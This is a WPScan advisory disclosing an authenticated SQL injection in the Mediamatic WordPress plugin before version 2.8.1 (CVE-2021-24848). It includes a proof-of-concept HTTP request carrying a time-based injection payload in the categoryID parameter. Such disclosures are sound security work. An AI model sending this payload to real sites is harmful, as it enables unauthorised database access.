WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Mediamatic < 2.8.1 - Subscriber+ SQL Injection

Description

The mediamaticAjaxRenameCategory AJAX action of the plugin, available to any authenticated user, does not sanitise the categoryID parameter before using it in a SQL statement, leading to an SQL injection

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

action=mediamaticAjaxRenameCategory&categoryID=1+union+select+1+and+sleep(10)

Affects Plugins

mediamatic
Fixed in version 2.8.1

References

CVE
CVE-2021-24848

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
156d4faf-7d34-4d9f-a654-9064d4eb3aea

Timeline

Publicly Published

2021-11-15 (about 1 years ago)

Added

2021-11-15 (about 1 years ago)

Last Updated

2022-09-26 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin